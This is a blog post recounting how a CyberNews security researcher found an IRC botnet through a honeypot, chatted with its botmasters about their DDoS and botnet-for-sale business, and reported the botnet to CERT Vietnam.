[German]A security researcher from CyberNews has succeeded in infiltrating an IRC botnet that tried to attack one of their honeypots. In a chat with the botmaster, the researcher tried to find out what the IRC botnet is used for and whether the cybercriminals who control it are involved in other activities. Finally, the botnet was reported to CERT Vietnam to shut it down.
The security researcher noticed an attempt to download a malicious file to one of the computers connected to the CyberNews Cowrie honeypot. The malicious file contained a Perl script designed to infect the host machine and allow the attacker to execute remote commands on the system.
Infiltrating the Botnet IRC channel
The security researcher wanted to find out as much as possible about this old botnet and the cyber criminals behind it. Once enough data had been collected, the botnet was to be deactivated. The findings were to go to the responsible authorities. The security researcher began the investigation by connecting to the IRC server address found in the malicious file to see if the botnet server was still active.
Since this was the case, the security researcher infiltrated the IRC channel used for communication between the bots and the botmaster. The researcher found a working IRC botnet with no less than 137 compromised systems.
Chat with the botmaster
Before the security researcher had the IRC botnet shut down, he tried to find out the botmasters’ motives: Why do they operate this botnet? Did they also carry out other criminal operations? The security researcher also wanted to know exactly what the botnet was used for. To get these answers, the researcher (BLUE) initiated a conversation with the botmaster (RED) via the IRC channel.
Chat with the botmaster
After a relatively trivial chat, the researcher slowly began asking the botmaster about the purpose of the IRC botnet. The botmaster gave several answers, claiming to use the network for DDoS attacks as well as for “testing”, “backdoors” and “money”. After a short back and forth, the botmaster suggested that the researcher switch to Discord, as he probably thought the researcher was a cybercriminal. Four users were active in the Discord channel. These had been informed beforehand that the new participant had intruded into the botnet’s IRC server.
The botmaster apparently also already knew that the malicious activity had been noticed in a honeypot. Soon after, the botmaster expressed his frustration that people often stumbled across their IRC server. The participants of the Discord channel further explained how they usually deal with such intruders by performing DDoS attacks against them.
As the chat session progressed, the botmasters’ ego seemed to grow with each additional question. Towards the end of the conversation, they claimed to have operated a botnet that spanned over 100,000 IoT devices, a very large botnet by today’s standards. With such a large botnet, they would be able to carry out large-scale DDoS attacks and launch massive spam campaigns.
When asked about their current activities, the botmasters said they were building networks with compromised devices and selling them to other cybercriminals for $3,000. This time, one of the botmasters even provided the proof in the form of a promotional video. During further investigation, the researcher discovered other videos on the botmaster’s YouTube channel that contained several advertisements of botnets for sale.
Finally, the botmaster claimed that they had 7,000 compromised IoT devices/bots in their current botnet and that the IRC botnet found by the researcher had been used for testing purposes only. When the security researcher asked the botmaster for an official interview and revealed his professional identity, the communication broke down.
The only remaining option was to report the IRC botnet to CERT in Vietnam, where the botnet’s command and control server was apparently located. CERT Vietnam was informed about the botnet on October 26, 2020. The country’s computer emergency response team is currently working to shut down the botmaster’s Command and Control server. Details can be read in this blog post.
Cookies helps to fund this blog: Cookie settings